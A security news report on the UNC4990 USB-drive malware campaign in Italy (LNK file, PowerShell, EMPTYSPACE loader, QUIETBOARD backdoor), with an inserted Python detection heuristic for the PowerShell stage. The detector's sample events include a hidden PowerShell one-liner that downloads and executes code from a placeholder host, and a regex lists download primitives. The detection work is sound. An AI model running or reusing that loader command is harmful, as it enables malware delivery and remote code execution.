Health, transportation, and logistics organizations across Italy have been targeted by the UNC4990 threat operation in a new attack campaign involving weaponized USB drives, which are used to facilitate the distribution of malware hosted on widely used websites, reports The Hacker News.
Attacks commence with the widespread infection of USB drives with a malicious LNK file which, when double-clicked, triggers a PowerShell script that downloads the EMPTYSPACE loader, also known as Vetta Loader or BrokerLoader, according to a report from Mandiant. Threat actors then use EMPTYSPACE to retrieve, from content hosted on Ars Technica, GitHub, and Vimeo, the QUIETBOARD backdoor, which has cryptojacking and arbitrary command execution capabilities, said researchers.
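The first stage of the chain described above (a shortcut on removable media that launches PowerShell to fetch a loader) leaves a recognisable footprint in process-creation telemetry. The following is an added detection example, not code from the article or from Mandiant: it scores Sysmon/EDR-style process-creation records for PowerShell started by explorer.exe (the parent seen on a shortcut double-click) combined with traits of a removable-media loader, such as a working directory or path on a drive the host enumerated as removable, a hidden window, or a download or encoded-command primitive. The record layout, the `ProcEvent` field names and the sample events are assumptions constructed for this example.

```python
"""Heuristic detection for the USB -> LNK -> PowerShell -> downloader stage.

Added example, not code from the article or from Mandiant. It scans
Sysmon/EDR-style process-creation records (constructed inline below) and
flags PowerShell launched from explorer.exe when the launch also shows
traits of a removable-media loader.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Download / in-memory execution primitives typical of one-liner loaders.
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|-EncodedCommand|\s-e(nc)?\s)",
    re.IGNORECASE,
)
HIDDEN_WINDOW_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Minimal process-creation record; the field names are this example's own."""
    parent_image: str
    image: str
    command_line: str
    current_directory: str
    removable_drives: Tuple[str, ...] = ()  # drive letters removable at event time


def _drive_letter(path: str):
    """Return the drive letter of a Windows path, or None if it has none."""
    m = re.match(r"([A-Za-z]):\\", path)
    return m.group(1).upper() if m else None


def score_event(ev: ProcEvent) -> List[str]:
    """Return the reasons this event resembles the LNK -> PowerShell stage."""
    reasons: List[str] = []
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    if ev.parent_image.lower().endswith("explorer.exe"):
        reasons.append("PowerShell spawned by explorer.exe (shortcut double-click path)")
    if HIDDEN_WINDOW_RE.search(ev.command_line):
        reasons.append("hidden window requested")
    if DOWNLOAD_RE.search(ev.command_line):
        reasons.append("download / encoded-command primitive in command line")
    removable = {d.upper() for d in ev.removable_drives}
    cwd_drive = _drive_letter(ev.current_directory)
    if cwd_drive in removable:
        reasons.append(f"working directory on removable drive {cwd_drive}:")
    for d in sorted(removable):
        if re.search(rf"\b{d}:\\", ev.command_line, re.IGNORECASE):
            reasons.append(f"command line references removable drive {d}:")
    return reasons


def is_suspicious(ev: ProcEvent) -> bool:
    """Require two independent traits: one alone (for example an admin's
    explorer-launched script) is far too common to alert on."""
    return len(score_event(ev)) >= 2


def scan(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, reasons) for every event that crosses the threshold."""
    return [(i, score_event(ev)) for i, ev in enumerate(events) if is_suspicious(ev)]


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\System32\\cmd.exe", PS,
              "powershell.exe -c Get-ChildItem", "C:\\Users\\alice", ()),
    ProcEvent("C:\\Windows\\explorer.exe", PS,
              "powershell.exe -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('https://example.invalid/stage')\"",
              "E:\\", ("E",)),
    ProcEvent("C:\\Windows\\explorer.exe", PS,
              "powershell.exe -File C:\\scripts\\backup.ps1", "C:\\Users\\bob", ()),
    ProcEvent("C:\\Windows\\explorer.exe", PS,
              "powershell.exe -nop -w hidden -File D:\\.docs\\open.ps1", "D:\\", ("D",)),
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

The removable-drive set is supplied per event because drive letters alone do not identify removable media; in practice it would be joined from device-arrival telemetry (for example Windows Event ID 2003/2100 from the DriverFrameworks-UserMode log, or the EDR's own USB events) at the time of the process start. The third sample shows why the two-trait threshold matters: an administrator double-clicking a local script also produces an explorer.exe parent, and would otherwise alert.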
"The analysis of both EMPTYSPACE and QUIETBOARD suggests how the threat actors took a modular approach in developing their toolset. The use of multiple programming languages to create different versions of the EMPTYSPACE downloader and the URL change when the Vimeo video was taken down show a predisposition for experimentation and adaptability on the threat actors' side," said Mandiant.